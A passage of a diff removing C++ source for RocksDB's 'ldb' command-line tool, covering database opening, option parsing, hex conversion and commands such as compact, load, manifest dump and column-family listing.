-                                       parsed_params.option_map,
-                                       parsed_params.flags);
-  } else if (parsed_params.cmd == CheckPointCommand::Name()) {
-    return new CheckPointCommand(parsed_params.cmd_params,
-                                 parsed_params.option_map,
-                                 parsed_params.flags);
-  } else if (parsed_params.cmd == RepairCommand::Name()) {
-    return new RepairCommand(parsed_params.cmd_params, parsed_params.option_map,
-                             parsed_params.flags);
-  } else if (parsed_params.cmd == BackupCommand::Name()) {
-    return new BackupCommand(parsed_params.cmd_params, parsed_params.option_map,
-                             parsed_params.flags);
-  } else if (parsed_params.cmd == RestoreCommand::Name()) {
-    return new RestoreCommand(parsed_params.cmd_params,
-                              parsed_params.option_map, parsed_params.flags);
-  }
-  return nullptr;
-}
-
-/* Run the command, and return the execute result. */
-void LDBCommand::Run() {
-  if (!exec_state_.IsNotStarted()) {
-    return;
-  }
-
-  if (db_ == nullptr && !NoDBOpen()) {
-    OpenDB();
-    if (exec_state_.IsFailed() && try_load_options_) {
-      // We don't always return if there is a failure because a WAL file or
-      // manifest file can be given to "dump" command so we should continue.
-      // --try_load_options is not valid in those cases.
-      return;
-    }
-  }
-
-  // We'll intentionally proceed even if the DB can't be opened because users
-  // can also specify a filename, not just a directory.
-  DoCommand();
-
-  if (exec_state_.IsNotStarted()) {
-    exec_state_ = LDBCommandExecuteResult::Succeed("");
-  }
-
-  if (db_ != nullptr) {
-    CloseDB();
-  }
-}
-
-LDBCommand::LDBCommand(const std::map<std::string, std::string>& options,
-                       const std::vector<std::string>& flags, bool is_read_only,
-                       const std::vector<std::string>& valid_cmd_line_options)
-    : db_(nullptr),
-      is_read_only_(is_read_only),
-      is_key_hex_(false),
-      is_value_hex_(false),
-      is_db_ttl_(false),
-      timestamp_(false),
-      try_load_options_(false),
-      ignore_unknown_options_(false),
-      create_if_missing_(false),
-      option_map_(options),
-      flags_(flags),
-      valid_cmd_line_options_(valid_cmd_line_options) {
-  std::map<std::string, std::string>::const_iterator itr = options.find(ARG_DB);
-  if (itr != options.end()) {
-    db_path_ = itr->second;
-  }
-
-  itr = options.find(ARG_CF_NAME);
-  if (itr != options.end()) {
-    column_family_name_ = itr->second;
-  } else {
-    column_family_name_ = kDefaultColumnFamilyName;
-  }
-
-  is_key_hex_ = IsKeyHex(options, flags);
-  is_value_hex_ = IsValueHex(options, flags);
-  is_db_ttl_ = IsFlagPresent(flags, ARG_TTL);
-  timestamp_ = IsFlagPresent(flags, ARG_TIMESTAMP);
-  try_load_options_ = IsFlagPresent(flags, ARG_TRY_LOAD_OPTIONS);
-  ignore_unknown_options_ = IsFlagPresent(flags, ARG_IGNORE_UNKNOWN_OPTIONS);
-}
-
-void LDBCommand::OpenDB() {
-  Options opt;
-  bool opt_set = false;
-  if (!create_if_missing_ && try_load_options_) {
-    Status s = LoadLatestOptions(db_path_, Env::Default(), &opt,
-                                 &column_families_, ignore_unknown_options_);
-    if (s.ok()) {
-      opt_set = true;
-    } else if (!s.IsNotFound()) {
-      // Option file exists but load option file error.
-      std::string msg = s.ToString();
-      exec_state_ = LDBCommandExecuteResult::Failed(msg);
-      db_ = nullptr;
-      return;
-    }
-  }
-  if (!opt_set) {
-    opt = PrepareOptionsForOpenDB();
-  }
-  if (!exec_state_.IsNotStarted()) {
-    return;
-  }
-  // Open the DB.
-  Status st;
-  std::vector<ColumnFamilyHandle*> handles_opened;
-  if (is_db_ttl_) {
-    // ldb doesn't yet support TTL DB with multiple column families
-    if (!column_family_name_.empty() || !column_families_.empty()) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          "ldb doesn't support TTL DB with multiple column families");
-    }
-    if (is_read_only_) {
-      st = DBWithTTL::Open(opt, db_path_, &db_ttl_, 0, true);
-    } else {
-      st = DBWithTTL::Open(opt, db_path_, &db_ttl_);
-    }
-    db_ = db_ttl_;
-  } else {
-    if (!opt_set && column_families_.empty()) {
-      // Try to figure out column family lists
-      std::vector<std::string> cf_list;
-      st = DB::ListColumnFamilies(DBOptions(), db_path_, &cf_list);
-      // There is possible the DB doesn't exist yet, for "create if not
-      // "existing case". The failure is ignored here. We rely on DB::Open()
-      // to give us the correct error message for problem with opening
-      // existing DB.
-      if (st.ok() && cf_list.size() > 1) {
-        // Ignore single column family DB.
-        for (auto cf_name : cf_list) {
-          column_families_.emplace_back(cf_name, opt);
-        }
-      }
-    }
-    if (is_read_only_) {
-      if (column_families_.empty()) {
-        st = DB::OpenForReadOnly(opt, db_path_, &db_);
-      } else {
-        st = DB::OpenForReadOnly(opt, db_path_, column_families_,
-                                 &handles_opened, &db_);
-      }
-    } else {
-      if (column_families_.empty()) {
-        st = DB::Open(opt, db_path_, &db_);
-      } else {
-        st = DB::Open(opt, db_path_, column_families_, &handles_opened, &db_);
-      }
-    }
-  }
-  if (!st.ok()) {
-    std::string msg = st.ToString();
-    exec_state_ = LDBCommandExecuteResult::Failed(msg);
-  } else if (!handles_opened.empty()) {
-    assert(handles_opened.size() == column_families_.size());
-    bool found_cf_name = false;
-    for (size_t i = 0; i < handles_opened.size(); i++) {
-      cf_handles_[column_families_[i].name] = handles_opened[i];
-      if (column_family_name_ == column_families_[i].name) {
-        found_cf_name = true;
-      }
-    }
-    if (!found_cf_name) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          "Non-existing column family " + column_family_name_);
-      CloseDB();
-    }
-  } else {
-    // We successfully opened DB in single column family mode.
-    assert(column_families_.empty());
-    if (column_family_name_ != kDefaultColumnFamilyName) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          "Non-existing column family " + column_family_name_);
-      CloseDB();
-    }
-  }
-
-  options_ = opt;
-}
-
-void LDBCommand::CloseDB() {
-  if (db_ != nullptr) {
-    for (auto& pair : cf_handles_) {
-      delete pair.second;
-    }
-    delete db_;
-    db_ = nullptr;
-  }
-}
-
-ColumnFamilyHandle* LDBCommand::GetCfHandle() {
-  if (!cf_handles_.empty()) {
-    auto it = cf_handles_.find(column_family_name_);
-    if (it == cf_handles_.end()) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          "Cannot find column family " + column_family_name_);
-    } else {
-      return it->second;
-    }
-  }
-  return db_->DefaultColumnFamily();
-}
-
-std::vector<std::string> LDBCommand::BuildCmdLineOptions(
-    std::vector<std::string> options) {
-  std::vector<std::string> ret = {ARG_DB,
-                                  ARG_BLOOM_BITS,
-                                  ARG_BLOCK_SIZE,
-                                  ARG_AUTO_COMPACTION,
-                                  ARG_COMPRESSION_TYPE,
-                                  ARG_COMPRESSION_MAX_DICT_BYTES,
-                                  ARG_WRITE_BUFFER_SIZE,
-                                  ARG_FILE_SIZE,
-                                  ARG_FIX_PREFIX_LEN,
-                                  ARG_TRY_LOAD_OPTIONS,
-                                  ARG_IGNORE_UNKNOWN_OPTIONS,
-                                  ARG_CF_NAME};
-  ret.insert(ret.end(), options.begin(), options.end());
-  return ret;
-}
-
-/**
- * Parses the specific integer option and fills in the value.
- * Returns true if the option is found.
- * Returns false if the option is not found or if there is an error parsing the
- * value.  If there is an error, the specified exec_state is also
- * updated.
- */
-bool LDBCommand::ParseIntOption(
-    const std::map<std::string, std::string>& options,
-    const std::string& option, int& value,
-    LDBCommandExecuteResult& exec_state) {
-  std::map<std::string, std::string>::const_iterator itr =
-      option_map_.find(option);
-  if (itr != option_map_.end()) {
-    try {
-#if defined(CYGWIN)
-      value = strtol(itr->second.c_str(), 0, 10);
-#else
-      value = std::stoi(itr->second);
-#endif
-      return true;
-    } catch (const std::invalid_argument&) {
-      exec_state =
-          LDBCommandExecuteResult::Failed(option + " has an invalid value.");
-    } catch (const std::out_of_range&) {
-      exec_state = LDBCommandExecuteResult::Failed(
-          option + " has a value out-of-range.");
-    }
-  }
-  return false;
-}
-
-/**
- * Parses the specified option and fills in the value.
- * Returns true if the option is found.
- * Returns false otherwise.
- */
-bool LDBCommand::ParseStringOption(
-    const std::map<std::string, std::string>& options,
-    const std::string& option, std::string* value) {
-  auto itr = option_map_.find(option);
-  if (itr != option_map_.end()) {
-    *value = itr->second;
-    return true;
-  }
-  return false;
-}
-
-Options LDBCommand::PrepareOptionsForOpenDB() {
-
-  Options opt = options_;
-  opt.create_if_missing = false;
-
-  std::map<std::string, std::string>::const_iterator itr;
-
-  BlockBasedTableOptions table_options;
-  bool use_table_options = false;
-  int bits;
-  if (ParseIntOption(option_map_, ARG_BLOOM_BITS, bits, exec_state_)) {
-    if (bits > 0) {
-      use_table_options = true;
-      table_options.filter_policy.reset(NewBloomFilterPolicy(bits));
-    } else {
-      exec_state_ =
-          LDBCommandExecuteResult::Failed(ARG_BLOOM_BITS + " must be > 0.");
-    }
-  }
-
-  int block_size;
-  if (ParseIntOption(option_map_, ARG_BLOCK_SIZE, block_size, exec_state_)) {
-    if (block_size > 0) {
-      use_table_options = true;
-      table_options.block_size = block_size;
-    } else {
-      exec_state_ =
-          LDBCommandExecuteResult::Failed(ARG_BLOCK_SIZE + " must be > 0.");
-    }
-  }
-
-  if (use_table_options) {
-    opt.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  }
-
-  itr = option_map_.find(ARG_AUTO_COMPACTION);
-  if (itr != option_map_.end()) {
-    opt.disable_auto_compactions = ! StringToBool(itr->second);
-  }
-
-  itr = option_map_.find(ARG_COMPRESSION_TYPE);
-  if (itr != option_map_.end()) {
-    std::string comp = itr->second;
-    if (comp == "no") {
-      opt.compression = kNoCompression;
-    } else if (comp == "snappy") {
-      opt.compression = kSnappyCompression;
-    } else if (comp == "zlib") {
-      opt.compression = kZlibCompression;
-    } else if (comp == "bzip2") {
-      opt.compression = kBZip2Compression;
-    } else if (comp == "lz4") {
-      opt.compression = kLZ4Compression;
-    } else if (comp == "lz4hc") {
-      opt.compression = kLZ4HCCompression;
-    } else if (comp == "xpress") {
-      opt.compression = kXpressCompression;
-    } else if (comp == "zstd") {
-      opt.compression = kZSTD;
-    } else {
-      // Unknown compression.
-      exec_state_ =
-          LDBCommandExecuteResult::Failed("Unknown compression level: " + comp);
-    }
-  }
-
-  int compression_max_dict_bytes;
-  if (ParseIntOption(option_map_, ARG_COMPRESSION_MAX_DICT_BYTES,
-                     compression_max_dict_bytes, exec_state_)) {
-    if (compression_max_dict_bytes >= 0) {
-      opt.compression_opts.max_dict_bytes = compression_max_dict_bytes;
-    } else {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          ARG_COMPRESSION_MAX_DICT_BYTES + " must be >= 0.");
-    }
-  }
-
-  int db_write_buffer_size;
-  if (ParseIntOption(option_map_, ARG_DB_WRITE_BUFFER_SIZE,
-        db_write_buffer_size, exec_state_)) {
-    if (db_write_buffer_size >= 0) {
-      opt.db_write_buffer_size = db_write_buffer_size;
-    } else {
-      exec_state_ = LDBCommandExecuteResult::Failed(ARG_DB_WRITE_BUFFER_SIZE +
-                                                    " must be >= 0.");
-    }
-  }
-
-  int write_buffer_size;
-  if (ParseIntOption(option_map_, ARG_WRITE_BUFFER_SIZE, write_buffer_size,
-        exec_state_)) {
-    if (write_buffer_size > 0) {
-      opt.write_buffer_size = write_buffer_size;
-    } else {
-      exec_state_ = LDBCommandExecuteResult::Failed(ARG_WRITE_BUFFER_SIZE +
-                                                    " must be > 0.");
-    }
-  }
-
-  int file_size;
-  if (ParseIntOption(option_map_, ARG_FILE_SIZE, file_size, exec_state_)) {
-    if (file_size > 0) {
-      opt.target_file_size_base = file_size;
-    } else {
-      exec_state_ =
-          LDBCommandExecuteResult::Failed(ARG_FILE_SIZE + " must be > 0.");
-    }
-  }
-
-  if (opt.db_paths.size() == 0) {
-    opt.db_paths.emplace_back(db_path_, std::numeric_limits<uint64_t>::max());
-  }
-
-  int fix_prefix_len;
-  if (ParseIntOption(option_map_, ARG_FIX_PREFIX_LEN, fix_prefix_len,
-                     exec_state_)) {
-    if (fix_prefix_len > 0) {
-      opt.prefix_extractor.reset(
-          NewFixedPrefixTransform(static_cast<size_t>(fix_prefix_len)));
-    } else {
-      exec_state_ =
-          LDBCommandExecuteResult::Failed(ARG_FIX_PREFIX_LEN + " must be > 0.");
-    }
-  }
-
-  return opt;
-}
-
-bool LDBCommand::ParseKeyValue(const std::string& line, std::string* key,
-                               std::string* value, bool is_key_hex,
-                               bool is_value_hex) {
-  size_t pos = line.find(DELIM);
-  if (pos != std::string::npos) {
-    *key = line.substr(0, pos);
-    *value = line.substr(pos + strlen(DELIM));
-    if (is_key_hex) {
-      *key = HexToString(*key);
-    }
-    if (is_value_hex) {
-      *value = HexToString(*value);
-    }
-    return true;
-  } else {
-    return false;
-  }
-}
-
-/**
- * Make sure that ONLY the command-line options and flags expected by this
- * command are specified on the command-line.  Extraneous options are usually
- * the result of user error.
- * Returns true if all checks pass.  Else returns false, and prints an
- * appropriate error msg to stderr.
- */
-bool LDBCommand::ValidateCmdLineOptions() {
-  for (std::map<std::string, std::string>::const_iterator itr =
-           option_map_.begin();
-       itr != option_map_.end(); ++itr) {
-    if (std::find(valid_cmd_line_options_.begin(),
-                  valid_cmd_line_options_.end(),
-                  itr->first) == valid_cmd_line_options_.end()) {
-      fprintf(stderr, "Invalid command-line option %s\n", itr->first.c_str());
-      return false;
-    }
-  }
-
-  for (std::vector<std::string>::const_iterator itr = flags_.begin();
-       itr != flags_.end(); ++itr) {
-    if (std::find(valid_cmd_line_options_.begin(),
-                  valid_cmd_line_options_.end(),
-                  *itr) == valid_cmd_line_options_.end()) {
-      fprintf(stderr, "Invalid command-line flag %s\n", itr->c_str());
-      return false;
-    }
-  }
-
-  if (!NoDBOpen() && option_map_.find(ARG_DB) == option_map_.end() &&
-      option_map_.find(ARG_PATH) == option_map_.end()) {
-    fprintf(stderr, "Either %s or %s must be specified.\n", ARG_DB.c_str(),
-            ARG_PATH.c_str());
-    return false;
-  }
-
-  return true;
-}
-
-std::string LDBCommand::HexToString(const std::string& str) {
-  std::string result;
-  std::string::size_type len = str.length();
-  if (len < 2 || str[0] != '0' || str[1] != 'x') {
-    fprintf(stderr, "Invalid hex input %s.  Must start with 0x\n", str.c_str());
-    throw "Invalid hex input";
-  }
-  if (!Slice(str.data() + 2, len - 2).DecodeHex(&result)) {
-    throw "Invalid hex input";
-  }
-  return result;
-}
-
-std::string LDBCommand::StringToHex(const std::string& str) {
-  std::string result("0x");
-  result.append(Slice(str).ToString(true));
-  return result;
-}
-
-std::string LDBCommand::PrintKeyValue(const std::string& key,
-                                      const std::string& value, bool is_key_hex,
-                                      bool is_value_hex) {
-  std::string result;
-  result.append(is_key_hex ? StringToHex(key) : key);
-  result.append(DELIM);
-  result.append(is_value_hex ? StringToHex(value) : value);
-  return result;
-}
-
-std::string LDBCommand::PrintKeyValue(const std::string& key,
-                                      const std::string& value, bool is_hex) {
-  return PrintKeyValue(key, value, is_hex, is_hex);
-}
-
-std::string LDBCommand::HelpRangeCmdArgs() {
-  std::ostringstream str_stream;
-  str_stream << " ";
-  str_stream << "[--" << ARG_FROM << "] ";
-  str_stream << "[--" << ARG_TO << "] ";
-  return str_stream.str();
-}
-
-bool LDBCommand::IsKeyHex(const std::map<std::string, std::string>& options,
-                          const std::vector<std::string>& flags) {
-  return (IsFlagPresent(flags, ARG_HEX) || IsFlagPresent(flags, ARG_KEY_HEX) ||
-          ParseBooleanOption(options, ARG_HEX, false) ||
-          ParseBooleanOption(options, ARG_KEY_HEX, false));
-}
-
-bool LDBCommand::IsValueHex(const std::map<std::string, std::string>& options,
-                            const std::vector<std::string>& flags) {
-  return (IsFlagPresent(flags, ARG_HEX) ||
-          IsFlagPresent(flags, ARG_VALUE_HEX) ||
-          ParseBooleanOption(options, ARG_HEX, false) ||
-          ParseBooleanOption(options, ARG_VALUE_HEX, false));
-}
-
-bool LDBCommand::ParseBooleanOption(
-    const std::map<std::string, std::string>& options,
-    const std::string& option, bool default_val) {
-  std::map<std::string, std::string>::const_iterator itr = options.find(option);
-  if (itr != options.end()) {
-    std::string option_val = itr->second;
-    return StringToBool(itr->second);
-  }
-  return default_val;
-}
-
-bool LDBCommand::StringToBool(std::string val) {
-  std::transform(val.begin(), val.end(), val.begin(),
-                 [](char ch) -> char { return (char)::tolower(ch); });
-
-  if (val == "true") {
-    return true;
-  } else if (val == "false") {
-    return false;
-  } else {
-    throw "Invalid value for boolean argument";
-  }
-}
-
-CompactorCommand::CompactorCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false,
-                 BuildCmdLineOptions({ARG_FROM, ARG_TO, ARG_HEX, ARG_KEY_HEX,
-                                      ARG_VALUE_HEX, ARG_TTL})),
-      null_from_(true),
-      null_to_(true) {
-  std::map<std::string, std::string>::const_iterator itr =
-      options.find(ARG_FROM);
-  if (itr != options.end()) {
-    null_from_ = false;
-    from_ = itr->second;
-  }
-
-  itr = options.find(ARG_TO);
-  if (itr != options.end()) {
-    null_to_ = false;
-    to_ = itr->second;
-  }
-
-  if (is_key_hex_) {
-    if (!null_from_) {
-      from_ = HexToString(from_);
-    }
-    if (!null_to_) {
-      to_ = HexToString(to_);
-    }
-  }
-}
-
-void CompactorCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(CompactorCommand::Name());
-  ret.append(HelpRangeCmdArgs());
-  ret.append("\n");
-}
-
-void CompactorCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-
-  Slice* begin = nullptr;
-  Slice* end = nullptr;
-  if (!null_from_) {
-    begin = new Slice(from_);
-  }
-  if (!null_to_) {
-    end = new Slice(to_);
-  }
-
-  CompactRangeOptions cro;
-  cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-
-  db_->CompactRange(cro, GetCfHandle(), begin, end);
-  exec_state_ = LDBCommandExecuteResult::Succeed("");
-
-  delete begin;
-  delete end;
-}
-
-// ----------------------------------------------------------------------------
-
-const std::string DBLoaderCommand::ARG_DISABLE_WAL = "disable_wal";
-const std::string DBLoaderCommand::ARG_BULK_LOAD = "bulk_load";
-const std::string DBLoaderCommand::ARG_COMPACT = "compact";
-
-DBLoaderCommand::DBLoaderCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(
-          options, flags, false,
-          BuildCmdLineOptions({ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX, ARG_FROM,
-                               ARG_TO, ARG_CREATE_IF_MISSING, ARG_DISABLE_WAL,
-                               ARG_BULK_LOAD, ARG_COMPACT})),
-      disable_wal_(false),
-      bulk_load_(false),
-      compact_(false) {
-  create_if_missing_ = IsFlagPresent(flags, ARG_CREATE_IF_MISSING);
-  disable_wal_ = IsFlagPresent(flags, ARG_DISABLE_WAL);
-  bulk_load_ = IsFlagPresent(flags, ARG_BULK_LOAD);
-  compact_ = IsFlagPresent(flags, ARG_COMPACT);
-}
-
-void DBLoaderCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(DBLoaderCommand::Name());
-  ret.append(" [--" + ARG_CREATE_IF_MISSING + "]");
-  ret.append(" [--" + ARG_DISABLE_WAL + "]");
-  ret.append(" [--" + ARG_BULK_LOAD + "]");
-  ret.append(" [--" + ARG_COMPACT + "]");
-  ret.append("\n");
-}
-
-Options DBLoaderCommand::PrepareOptionsForOpenDB() {
-  Options opt = LDBCommand::PrepareOptionsForOpenDB();
-  opt.create_if_missing = create_if_missing_;
-  if (bulk_load_) {
-    opt.PrepareForBulkLoad();
-  }
-  return opt;
-}
-
-void DBLoaderCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-
-  WriteOptions write_options;
-  if (disable_wal_) {
-    write_options.disableWAL = true;
-  }
-
-  int bad_lines = 0;
-  std::string line;
-  // prefer ifstream getline performance vs that from std::cin istream
-  std::ifstream ifs_stdin("/dev/stdin");
-  std::istream* istream_p = ifs_stdin.is_open() ? &ifs_stdin : &std::cin;
-  while (getline(*istream_p, line, '\n')) {
-    std::string key;
-    std::string value;
-    if (ParseKeyValue(line, &key, &value, is_key_hex_, is_value_hex_)) {
-      db_->Put(write_options, GetCfHandle(), Slice(key), Slice(value));
-    } else if (0 == line.find("Keys in range:")) {
-      // ignore this line
-    } else if (0 == line.find("Created bg thread 0x")) {
-      // ignore this line
-    } else {
-      bad_lines ++;
-    }
-  }
-
-  if (bad_lines > 0) {
-    std::cout << "Warning: " << bad_lines << " bad lines ignored." << std::endl;
-  }
-  if (compact_) {
-    db_->CompactRange(CompactRangeOptions(), GetCfHandle(), nullptr, nullptr);
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-namespace {
-
-void DumpManifestFile(std::string file, bool verbose, bool hex, bool json) {
-  Options options;
-  EnvOptions sopt;
-  std::string dbname("dummy");
-  std::shared_ptr<Cache> tc(NewLRUCache(options.max_open_files - 10,
-                                        options.table_cache_numshardbits));
-  // Notice we are using the default options not through SanitizeOptions(),
-  // if VersionSet::DumpManifest() depends on any option done by
-  // SanitizeOptions(), we need to initialize it manually.
-  options.db_paths.emplace_back("dummy", 0);
-  options.num_levels = 64;
-  WriteController wc(options.delayed_write_rate);
-  WriteBufferManager wb(options.db_write_buffer_size);
-  ImmutableDBOptions immutable_db_options(options);
-  VersionSet versions(dbname, &immutable_db_options, sopt, tc.get(), &wb, &wc);
-  Status s = versions.DumpManifest(options, file, verbose, hex, json);
-  if (!s.ok()) {
-    printf("Error in processing file %s %s\n", file.c_str(),
-           s.ToString().c_str());
-  }
-}
-
-}  // namespace
-
-const std::string ManifestDumpCommand::ARG_VERBOSE = "verbose";
-const std::string ManifestDumpCommand::ARG_JSON = "json";
-const std::string ManifestDumpCommand::ARG_PATH = "path";
-
-void ManifestDumpCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(ManifestDumpCommand::Name());
-  ret.append(" [--" + ARG_VERBOSE + "]");
-  ret.append(" [--" + ARG_JSON + "]");
-  ret.append(" [--" + ARG_PATH + "=<path_to_manifest_file>]");
-  ret.append("\n");
-}
-
-ManifestDumpCommand::ManifestDumpCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(
-          options, flags, false,
-          BuildCmdLineOptions({ARG_VERBOSE, ARG_PATH, ARG_HEX, ARG_JSON})),
-      verbose_(false),
-      json_(false),
-      path_("") {
-  verbose_ = IsFlagPresent(flags, ARG_VERBOSE);
-  json_ = IsFlagPresent(flags, ARG_JSON);
-
-  std::map<std::string, std::string>::const_iterator itr =
-      options.find(ARG_PATH);
-  if (itr != options.end()) {
-    path_ = itr->second;
-    if (path_.empty()) {
-      exec_state_ = LDBCommandExecuteResult::Failed("--path: missing pathname");
-    }
-  }
-}
-
-void ManifestDumpCommand::DoCommand() {
-
-  std::string manifestfile;
-
-  if (!path_.empty()) {
-    manifestfile = path_;
-  } else {
-    bool found = false;
-    // We need to find the manifest file by searching the directory
-    // containing the db for files of the form MANIFEST_[0-9]+
-
-    auto CloseDir = [](DIR* p) { closedir(p); };
-    std::unique_ptr<DIR, decltype(CloseDir)> d(opendir(db_path_.c_str()),
-                                               CloseDir);
-
-    if (d == nullptr) {
-      exec_state_ =
-          LDBCommandExecuteResult::Failed(db_path_ + " is not a directory");
-      return;
-    }
-    struct dirent* entry;
-    while ((entry = readdir(d.get())) != nullptr) {
-      unsigned int match;
-      uint64_t num;
-      if (sscanf(entry->d_name, "MANIFEST-%" PRIu64 "%n", &num, &match) &&
-          match == strlen(entry->d_name)) {
-        if (!found) {
-          manifestfile = db_path_ + "/" + std::string(entry->d_name);
-          found = true;
-        } else {
-          exec_state_ = LDBCommandExecuteResult::Failed(
-              "Multiple MANIFEST files found; use --path to select one");
-          return;
-        }
-      }
-    }
-  }
-
-  if (verbose_) {
-    printf("Processing Manifest file %s\n", manifestfile.c_str());
-  }
-
-  DumpManifestFile(manifestfile, verbose_, is_key_hex_, json_);
-
-  if (verbose_) {
-    printf("Processing Manifest file %s done\n", manifestfile.c_str());
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-void ListColumnFamiliesCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(ListColumnFamiliesCommand::Name());
-  ret.append(" full_path_to_db_directory ");
-  ret.append("\n");
-}
-
-ListColumnFamiliesCommand::ListColumnFamiliesCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false, {}) {
-  if (params.size() != 1) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "dbname must be specified for the list_column_families command");
-  } else {
-    dbname_ = params[0];
-  }
-}
-
-void ListColumnFamiliesCommand::DoCommand() {
-  std::vector<std::string> column_families;
-  Status s = DB::ListColumnFamilies(DBOptions(), dbname_, &column_families);
-  if (!s.ok()) {
-    printf("Error in processing db %s %s\n", dbname_.c_str(),
-           s.ToString().c_str());
-  } else {
-    printf("Column families in %s: \n{", dbname_.c_str());
-    bool first = true;
-    for (auto cf : column_families) {
-      if (!first) {
-        printf(", ");
-      }
-      first = false;
-      printf("%s", cf.c_str());
-    }
-    printf("}\n");
-  }
-}
-
-void CreateColumnFamilyCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(CreateColumnFamilyCommand::Name());
-  ret.append(" --db=<db_path> <new_column_family_name>");
-  ret.append("\n");
-}
-
-CreateColumnFamilyCommand::CreateColumnFamilyCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, true, {ARG_DB}) {
-  if (params.size() != 1) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "new column family name must be specified");
-  } else {
-    new_cf_name_ = params[0];
-  }
-}
-
-void CreateColumnFamilyCommand::DoCommand() {
-  ColumnFamilyHandle* new_cf_handle = nullptr;
-  Status st = db_->CreateColumnFamily(options_, new_cf_name_, &new_cf_handle);
-  if (st.ok()) {
-    fprintf(stdout, "OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "Fail to create new column family: " + st.ToString());
-  }
-  delete new_cf_handle;
-  CloseDB();
-}
-
-// ----------------------------------------------------------------------------
-
-namespace {
-
-std::string ReadableTime(int unixtime) {
-  char time_buffer [80];
-  time_t rawtime = unixtime;
-  struct tm tInfo;
-  struct tm* timeinfo = localtime_r(&rawtime, &tInfo);
-  assert(timeinfo == &tInfo);
-  strftime(time_buffer, 80, "%c", timeinfo);
-  return std::string(time_buffer);
-}
-
-// This function only called when it's the sane case of >1 buckets in time-range
-// Also called only when timekv falls between ttl_start and ttl_end provided
-void IncBucketCounts(std::vector<uint64_t>& bucket_counts, int ttl_start,
-                     int time_range, int bucket_size, int timekv,
-                     int num_buckets) {
-  assert(time_range > 0 && timekv >= ttl_start && bucket_size > 0 &&
-    timekv < (ttl_start + time_range) && num_buckets > 1);
-  int bucket = (timekv - ttl_start) / bucket_size;
-  bucket_counts[bucket]++;
-}
-
-void PrintBucketCounts(const std::vector<uint64_t>& bucket_counts,
-                       int ttl_start, int ttl_end, int bucket_size,
-                       int num_buckets) {
-  int time_point = ttl_start;
-  for(int i = 0; i < num_buckets - 1; i++, time_point += bucket_size) {
-    fprintf(stdout, "Keys in range %s to %s : %lu\n",
-            ReadableTime(time_point).c_str(),
-            ReadableTime(time_point + bucket_size).c_str(),
-            (unsigned long)bucket_counts[i]);
-  }
-  fprintf(stdout, "Keys in range %s to %s : %lu\n",
-          ReadableTime(time_point).c_str(),
-          ReadableTime(ttl_end).c_str(),
-          (unsigned long)bucket_counts[num_buckets - 1]);
-}
-
-}  // namespace
-
-const std::string InternalDumpCommand::ARG_COUNT_ONLY = "count_only";
-const std::string InternalDumpCommand::ARG_COUNT_DELIM = "count_delim";
-const std::string InternalDumpCommand::ARG_STATS = "stats";
-const std::string InternalDumpCommand::ARG_INPUT_KEY_HEX = "input_key_hex";
-
-InternalDumpCommand::InternalDumpCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(
-          options, flags, true,
-          BuildCmdLineOptions({ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX, ARG_FROM,
-                               ARG_TO, ARG_MAX_KEYS, ARG_COUNT_ONLY,
-                               ARG_COUNT_DELIM, ARG_STATS, ARG_INPUT_KEY_HEX})),
-      has_from_(false),
-      has_to_(false),
-      max_keys_(-1),
-      delim_("."),
-      count_only_(false),
-      count_delim_(false),
-      print_stats_(false),
-      is_input_key_hex_(false) {
-  has_from_ = ParseStringOption(options, ARG_FROM, &from_);
-  has_to_ = ParseStringOption(options, ARG_TO, &to_);
-
-  ParseIntOption(options, ARG_MAX_KEYS, max_keys_, exec_state_);
-  std::map<std::string, std::string>::const_iterator itr =
-      options.find(ARG_COUNT_DELIM);
-  if (itr != options.end()) {
-    delim_ = itr->second;
-    count_delim_ = true;
-   // fprintf(stdout,"delim = %c\n",delim_[0]);
-  } else {
-    count_delim_ = IsFlagPresent(flags, ARG_COUNT_DELIM);
-    delim_=".";
-  }
-
-  print_stats_ = IsFlagPresent(flags, ARG_STATS);
-  count_only_ = IsFlagPresent(flags, ARG_COUNT_ONLY);
-  is_input_key_hex_ = IsFlagPresent(flags, ARG_INPUT_KEY_HEX);
-
-  if (is_input_key_hex_) {
-    if (has_from_) {
-      from_ = HexToString(from_);
-    }
-    if (has_to_) {
-      to_ = HexToString(to_);
-    }
-  }
-}
-
-void InternalDumpCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(InternalDumpCommand::Name());
-  ret.append(HelpRangeCmdArgs());
-  ret.append(" [--" + ARG_INPUT_KEY_HEX + "]");
-  ret.append(" [--" + ARG_MAX_KEYS + "=<N>]");
